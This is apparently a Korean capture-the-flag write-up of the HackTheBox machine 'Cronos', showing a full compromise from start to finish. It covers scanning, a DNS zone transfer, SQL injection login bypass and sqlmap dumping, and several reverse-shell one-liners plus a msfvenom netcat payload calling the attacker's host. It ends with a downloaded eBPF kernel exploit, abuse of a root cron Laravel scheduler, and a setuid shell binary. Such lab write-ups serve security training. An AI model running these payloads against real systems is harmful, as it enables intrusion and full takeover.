1. SCANNING
┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 10.10.10.13 1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 17:17 KST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(root💀takudaddy)-[~]
└─# nmap --script vuln -oA vulnscan 10.10.10.13
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 17:25 KST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
53 domain
위와 같이 Default page가 뜨면
어떤 설정 파일(configuration file)이
잘못 되어 있거나 잘못 들어간 것.
해당 아이피에서 사용하고 있는
네임서버를 확인해 본다.
┌──(root💀takudaddy)-[/htb/c]
└─# nslookup 1 ⨯
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
>
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
>
> cronos.htb
Server: 10.10.10.13
Address: 10.10.10.13#53
Name: cronos.htb
Address: 10.10.10.13
>
추가 검색
┌──(root💀takudaddy)-[/htb/c]
└─# dig axfr @10.10.10.13 cronos.htb
; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 20 20:56:09 KST 2021
;; XFR size: 7 records (messages 1, bytes 203)
cronos.htb 이름으로
4개 운영 중.
host 파일에 모두 등록해 사용하자.
10.10.10.13 cronos.htb로 설정해준 뒤
┌──(root💀takudaddy)-[/htb/c]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 takudaddy.example.com takudaddy
10.10.10.13 cronos.htb www.cronos.htb admin.cronos.htb ns1.cronos.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
네임서버로 접속을 시도하면
제대로 뜬다.
버프를 사용할 경우 인터셉트 기능을 켜두고
Host 값을 cronos.htb로 바꿔준 뒤
forward 시키면
일시적으로 확인 가능.
2. WEB ENUMERATION + EXPLOITATION
==> DIRECTORY: http://cronos.htb/css/
+ http://cronos.htb/favicon.ico (CODE:200|SIZE:0)
+ http://cronos.htb/index.php (CODE:200|SIZE:2319)
==> DIRECTORY: http://cronos.htb/js/
+ http://cronos.htb/robots.txt (CODE:200|SIZE:24)
+ http://cronos.htb/server-status (CODE:403|SIZE:298)
+ http://cronos.htb/web.config (CODE:200|SIZE:914)
admin.cronos.htb enum
┌──(root💀takudaddy)-[/htb/c]
└─# sqlmap -u http://admin.cronos.htb --data="username=admin&password=" --dbs --batch
___
__H__
___ ___[)]_____ ___ ___ {1.5.2#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
....
돌려 놓고
간단한 sql injection 구문 넣어보는데
' or 1=1 -- -
' or 1=1 #
로긴 성공
그 사이 sqlmap 결과도 나왔는데
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[23:50:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
a
[23:50:48] [INFO] adjusting time delay to 2 seconds due to good response times
tion_schema
[23:52:20] [INFO] retrieved: admin
available databases [2]:
[*] `@\x00\x01nfoation_schema`
[*] admin
[23:52:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin.cronos.htb'
[*] ending @ 23:52:58 /2021-04-20/
admin 이라는 db 발견
로그인 된 마당에 더 캐는건
의미가 없지만
연습삼아 돌려놓고
진행한다. (결과는 다음과 같음)
┌──(root💀takudaddy)-[/htb/c]
└─# sqlmap -u http://admin.cronos.htb --data="username=admin&password=" -D admin -tables --dump --batch
do you want to use common password suffixes? (slow!) [y/N] N
[00:04:41] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:04:41] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[00:05:02] [WARNING] no clear password(s) found
Database: admin
Table: users
[1 entry]
+----+----------------------------------+----------+
| id | password | username |
+----+----------------------------------+----------+
| 1 | 4f5fffa7b2340178a716e3832451e058 | admin |
+----+----------------------------------+----------+
[00:05:02] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin.cronos.htb/dump/admin/users.csv'
[00:05:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin.cronos.htb'
명령어를 추가해 보자
된다.
유저 noulis를 확인했으니
hydra로 ssh brute force 돌려 놓고
리스너 하나 띄워서 리버스쉘 실행한다.
nc -e /bin/bash 10.10.14.13 7979 => 안됨
bash -i >&/dev/tcp/10.10.14.13/7979 0>&1 => 안됨
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
=> 안됨
======================================================
php -r '$sock=fsockopen("10.10.14.13",7979);exec("/bin/sh -i<&3 >&3 2>&3");' => 됨!
┌──(root💀takudaddy)-[/attack]
└─# nc -lvnp 7979 130 ⨯
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 39362
/bin/sh: 0: can't access tty; job control turned off
$ date ; whoami ; id ; hostname ; ifconfig
Tue Apr 20 15:27:39 EEST 2021
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cronos
ens160 Link encap:Ethernet HWaddr 00:50:56:b9:4b:74
inet addr:10.10.10.13 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:4b74/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:4b74/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8696380 errors:0 dropped:0 overruns:0 frame:0
TX packets:6427641 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2230143311 (2.2 GB) TX bytes:1285197176 (1.2 GB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:6265 errors:0 dropped:0 overruns:0 frame:0
TX packets:6265 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:613245 (613.2 KB) TX bytes:613245 (613.2 KB)
$
침투 성공
3. PRIVILEGE ESCALATION
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$ ls -al
ls -al
total 32
drwxr-xr-x 2 www-data www-data 4096 Jan 1 02:31 .
drwxr-xr-x 5 root root 4096 Apr 9 2017 ..
-rw-r--r-- 1 www-data www-data 1024 Apr 9 2017 .welcome.php.swp
-rw-r--r-- 1 www-data www-data 237 Apr 9 2017 config.php
-rw-r--r-- 1 www-data www-data 2531 Jan 1 02:31 index.php
-rw-r--r-- 1 www-data www-data 102 Apr 9 2017 logout.php
-rw-r--r-- 1 www-data www-data 383 Apr 9 2017 session.php
-rw-r--r-- 1 www-data www-data 782 Apr 9 2017 welcome.php
www-data@cronos:/var/www/admin$ cat config.php
cat config.php
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
define('DB_DATABASE', 'admin');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/admin$ mysql -u admin -p
mysql -u admin -p
Enter password: kEjdbRigfBHUREiNSDs
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 375
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| admin |
+--------------------+
2 rows in set (0.00 sec)
mysql> use admin;
use admin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
mysql> select * from users ;
select * from users ;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+
www-data@cronos:/home/noulis$ ls -al
ls -al
total 44
drwxr-xr-x 4 noulis noulis 4096 Apr 9 2017 .
drwxr-xr-x 3 root root 4096 Mar 22 2017 ..
-rw------- 1 root root 1 Dec 24 2017 .bash_history
-rw-r--r-- 1 noulis noulis 220 Mar 22 2017 .bash_logout
-rw-r--r-- 1 noulis noulis 3771 Mar 22 2017 .bashrc
drwx------ 2 noulis noulis 4096 Mar 22 2017 .cache
drwxr-xr-x 3 root root 4096 Apr 9 2017 .composer
-rw------- 1 root root 259 Apr 9 2017 .mysql_history
-rw-r--r-- 1 noulis noulis 655 Mar 22 2017 .profile
-rw-r--r-- 1 root root 66 Apr 9 2017 .selected_editor
-rw-r--r-- 1 noulis noulis 0 Mar 22 2017 .sudo_as_admin_successful
-r--r--r-- 1 noulis noulis 33 Mar 22 2017 user.txt
www-data@cronos:/home/noulis$ cat user.txt
cat user.txt
51d236438b333970dbba7dc3089be33b
4f5fffa7b2340178a716e3832451e058 : 1327663704
admin : 1327663704
위에서 sqlmap으로 이미 확인했다.
www-data@cronos:/home/noulis/.composer$ ls -al
ls -al
total 24
drwxr-xr-x 3 root root 4096 Apr 9 2017 .
drwxr-xr-x 4 noulis noulis 4096 Apr 9 2017 ..
-rw-r--r-- 1 root root 13 Apr 9 2017 .htaccess
drwxr-xr-x 5 root root 4096 Apr 9 2017 cache
-rw-r--r-- 1 root root 799 Apr 9 2017 keys.dev.pub
-rw-r--r-- 1 root root 799 Apr 9 2017 keys.tags.pub
www-data@cronos:/home/noulis/.composer$ cat keys.dev.pub
cat keys.dev.pub
www-data@cronos:/home/noulis/.composer$ cat keys.tags.pub
cat keys.tags.pub
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA0Vi/2K6apCVj76nCnCl2
MQUPdK+A9eqkYBacXo2wQBYmyVlXm2/n/ZsX6pCLYPQTHyr5jXbkQzBw8SKqPdlh
vA7NpbMeNCz7wP/AobvUXM8xQuXKbMDTY2uZ4O7sM+PfGbptKPBGLe8Z8d2sUnTO
bXtX6Lrj13wkRto7st/w/Yp33RHe9SlqkiiS4MsH1jBkcIkEHsRaveZzedUaxY0M
mba0uPhGUInpPzEHwrYqBBEtWvP97t2vtfx8I5qv28kh0Y6t+jnjL1Urid2iuQZf
noCMFIOu4vksK5HxJxxrN0GOmGmwVQjOOtxkwikNiotZGPR4KsVj8NnBrLX7oGuM
nQvGciiu+KoC2r3HDBrpDeBVdOWxDzT5R4iI0KoLzFh2pKqwbY+obNPS2bj+2dgJ
rV3V5Jjry42QOCBN3c88wU1PKftOLj2ECpewY6vnE478IipiEu7EAdK8Zwj2LmTr
RKQUSa9k7ggBkYZWAeO/2Ag0ey3g2bg7eqk+sHEq5ynIXd5lhv6tC5PBdHlWipDK
tl2IxiEnejnOmAzGVivE1YGduYBjN+mjxDVy8KGBrjnz1JPgAvgdwJ2dYw4Rsc/e
TzCFWGk/HM6a4f0IzBWbJ5ot0PIi4amk07IotBXDWwqDiQTwyuGCym5EqWQ2BD95
RGv89BPD+2DLnJysngsvVaUCAwEAAQ==
-----END PUBLIC KEY-----
www-data@cronos:/dev$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
</ -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd
www-data@cronos:/dev$
간단히 끝내는 방법
www-data@cronos:/tmp$ ./LES.sh
./LES.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
76 kernel space exploits
48 user space exploits
Possible Exploits:
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Ubuntu 16.04 의 다음 Kernel 들은
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-generic
45010.c 파일로 루트 획득이 가능하다.
www-data@cronos:/var/www/laravel/config$ uname -a
uname -a
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@cronos:/var/www/laravel/config$ cd /tmp
cd /tmp
www-data@cronos:/tmp$ wget http://10.10.14.13/45010
wget http://10.10.14.13/45010
--2021-04-20 16:07:35-- http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: '45010'
45010 0%[ ] 0 --.-KB/s 45010 77%[==============> ] 16.82K 81.8KB/s 45010 100%[===================>] 21.74K 105KB/s in 0.2s
2021-04-20 16:07:35 (105 KB/s) - '45010' saved [22264/22264]
www-data@cronos:/tmp$ chmod +x 45010
chmod +x 45010
www-data@cronos:/tmp$ ./45010
./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880039aca900
[*] Leaking sock struct from ffff8800372cdc00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003dc11300
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff88003dc11300
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
cat /root/root.txt
1703b8a3c9a8dde879942c79d02fd3a0
#
끝
다른 방법
www-data@cronos:/var/www/admin$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
www-data@cronos:/var/www/admin$
www-data@cronos:/var/www/laravel$ ls -l /var/www/laravel/artisan
ls -l /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 /var/www/laravel/artisan
www-data@cronos:/var/www/laravel$ file artisan
file artisan
artisan: a /usr/bin/env php script, ASCII text executable
루트 권한으로 매분 실행되는 artisan php 파일
www-data@cronos:/var/www/laravel$ cat artisan
cat artisan
#!/usr/bin/env php
<?php
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
require __DIR__.'/bootstrap/autoload.php';
$app = require_once __DIR__.'/bootstrap/app.php';
/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/
$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);
$status = $kernel->handle(
$input = new Symfony\Component\Console\Input\ArgvInput,
new Symfony\Component\Console\Output\ConsoleOutput
);
/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/
$kernel->terminate($input, $status);
exit($status);
www-data@cronos:/var/www/laravel$ php artisan schedule:run
php artisan schedule:run
No scheduled commands are ready to run.
https://laravel.kr/docs/5.7/scheduling
라라벨 5.7 - 작업 스케줄링
www-data@cronos:/var/www/laravel$ find / -name Kernel.php 2>/dev/null
find / -name Kernel.php 2>/dev/null
/var/www/laravel/app/Console/Kernel.php
/var/www/laravel/app/Http/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Foundation/Console/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Contracts/Console/Kernel.php
/var/www/laravel/vendor/laravel/framework/src/Illuminate/Contracts/Http/Kernel.php
/var/www/laravel/vendor/symfony/http-kernel/Kernel.php
www-data@cronos:/var/www/laravel$ cd app
cd app
www-data@cronos:/var/www/laravel/app$ cd Console
cd Console
www-data@cronos:/var/www/laravel/app/Console$ vi Kernel.php
vi Kernel.php
www-data@cronos:/var/www/laravel/app/Console$ cat Kernel.php
cat Kernel.php
<?php
namespace App\Console;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;
class Kernel extends ConsoleKernel
{
/**
* The Artisan commands provided by your application.
*
* @var array
*/
protected $commands = [
//
];
/**
* Define the application's command schedule.
*
* @param \Illuminate\Console\Scheduling\Schedule $schedule
* @return void
*/
protected function schedule(Schedule $schedule)
{
// $schedule->command('inspire')
// ->hourly();
}
/**
* Register the Closure based commands for the application.
*
* @return void
*/
protected function commands()
{
require base_path('routes/console.php');
}
}
www-data@cronos:/var/www/laravel/app/Console$
위 코드 중간에
protected function schedule(Schedule $schedule)
{
// $schedule->command('inspire')
// ->hourly();
}
이 부분에 명령어 추가해 주면 되는 듯 하다.
protected function schedule(Schedule $schedule)
{
$schedule->exec('touch /dev/shm/taku/test')->everyMinute();
// $schedule->command('inspire')
// ->hourly();
}
vi 편집기 사용이 가능한데
이상한 문자들이 나와
정상적인 편집이 불가능한 상황.
터미널 버전도 바꿔보고 이것저것
시도했지만 여전히 안되길래
포기하려 했으나 방법을 찾음.
주의 사항으로 이 작업을 하는데
호스트 쪽에서 zsh을 사용하면
에러가 나니 (칼리 2021 버전부터
기본 쉘이 zsh이다) 간단히 bash 쉘로
변경 후 사용하면 된다.
우선 침투 서버에서
python으로 /bin/bash import 후
$ ctrl + z 로 백그라운드 돌려놓고
호스트 터미널로 바뀌면
# stty raw -echo 입력,
# f + g + enter (포 그라운드)로 복귀 하면
편집이 가능하게 된다.
이제 명령어 수행이 정상적으로 되는지
테스트를 해본다.
/dev/shm 디렉터리 아래에
taku 디렉터리를 만들어 두었고
그곳에 test란 파일을 생성하도록
명령해 본다.
일 분을 기다리면 실행이 되고
파일이 루트 권한으로 정상적으로
생성 된 것을 확인할 수 있다.
www-data@cronos:/dev/shm/taku$ ls -l
total 20
-rw-r--r-- 1 root root 0 Apr 21 12:00 test
이를 활용한
루트 상승 방법은 여러가지.
nc 페이로드를 만들고
리스너를 기동시켜 주자.
──(root💀takudaddy)-[~]
└─# msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.13 LPORT=8989
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/samnj; nc 10.10.14.13 8989 0</tmp/samnj | /bin/sh >/tmp/samnj 2>&1; rm /tmp/samnj
만들어진 페이로드를
Kernel.php 파일 명령어로 넣고
조금 기다리면
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53900
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /root/root/txt
cat: /root/root/txt: No such file or directory
cd /root
cat root.txt
1703b8a3c9a8dde879942c79d02fd3a0
끝
다른 방법으로는 setuid 프로그램을 생성해
해당 프로그램을 루트 권한으로 변경해 주고
suid를 걸어준 뒤 실행하면 되는데
침투 서버에 gcc가 없어서 컴파일이 불가능하다.
uname -a 로 커널이 64비트인 것이 확인되었으니
공격 서버에서 코드를 제작, 미리 컴파일시킨 후
해당 파일을 내려받은 뒤 작업을 이어나가면 된다.
┌──(root💀takudaddy)-[/var/www/html]
└─# cat takudaddy.c 1 ⨯
#include <stdio.h>
int main(void) {
setuid(0);
setgid(0);
system("/bin/bash");
}
gcc -o takuattack takudaddy.c
www-data@cronos:/dev/shm/taku$ wget http://10.10.14.13/takuattack
--2021-04-21 12:09:21-- http://10.10.14.13/takuattack
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16712 (16K)
Saving to: 'takuattack'
takuattack 100%[===================>] 16.32K 79.9KB/s in 0.2s
2021-04-21 12:09:22 (79.9 KB/s) - 'takuattack' saved [16712/16712]
www-data@cronos:/dev/shm/taku$ ls -l
total 20
-rwxr-xr-x 1 www-data www-data 16712 Apr 21 09:44 takuattack
-rw-r--r-- 1 root root 0 Apr 21 12:00 test
www-data@cronos:/dev/shm/taku$ chmod +x takuattack
www-data@cronos:/dev/shm/taku$ ./takuattack
Kernel.php 파일 명령어 수정
$schedule->exec('chown root:root /dev/shm/taku/takuattack; chmod 4755 /dev/shm/taku/takuattack')->everyMinute();
www-data@cronos:/dev/shm/taku$ ls -l
total 20
-rwsr-xr-x 1 root root 16712 Apr 21 09:44 takuattack
-rw-r--r-- 1 root root 0 Apr 21 12:00 test
takuattack의 권한과 소유권이 정상적으로
바뀌었다. 이제 이를 실행하면 루트가 되는데
안된다. 왜냐하면
mount 명령어를 치고 /dev 디렉터리의 권한을 보니
read write는 가능하지만 suid 설정은 불가하다고 나오기 때문.
=> tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
작업한 파일을 tmp 폴더로 옮겨주고 다시 실행하면 되겠다.
=> /dev/mapper/cronos--vg-root on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
Kernel.php 파일 수정 부분
$schedule->exec('mv /dev/shm/taku/takuattack /tmp/takuattack; chown root:root /tmp/takuattack ; chmod 4755 /tmp/takuattack')->everyMinute();
일 분 기다린 후 /tmp 폴더를 살펴보면
www-data@cronos:/tmp$ ls -l
total 56
-rwsr-xr-x 1 root root 16712 Apr 21 09:44 takuattack
drwx------ 3 root root 4096 Apr 20 15:55 systemd-private-2f7fbbc00f9d45a4881e19e3d987ab74-systemd-timesyncd.service-KJRlWo
drwx------ 2 root root 4096 Apr 20 15:55 vmware-root
세팅한 권한으로 정상적으로 파일이 카피 되었고
실행해보면
www-data@cronos:/tmp$ ./takuattack
root@cronos:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@cronos:/tmp# whoami
root
루트
끝
728x90
반응형
'OSCP > HacktheBox' 카테고리의 다른 글
| 11. Brainfuck (0) | 2021.04.22 |
|---|---|
| 10. Sense (0) | 2021.04.22 |
| 8. Beep (0) | 2021.04.20 |
| 7. Valentine (0) | 2021.04.20 |
| 6. Nibbles (0) | 2021.04.19 |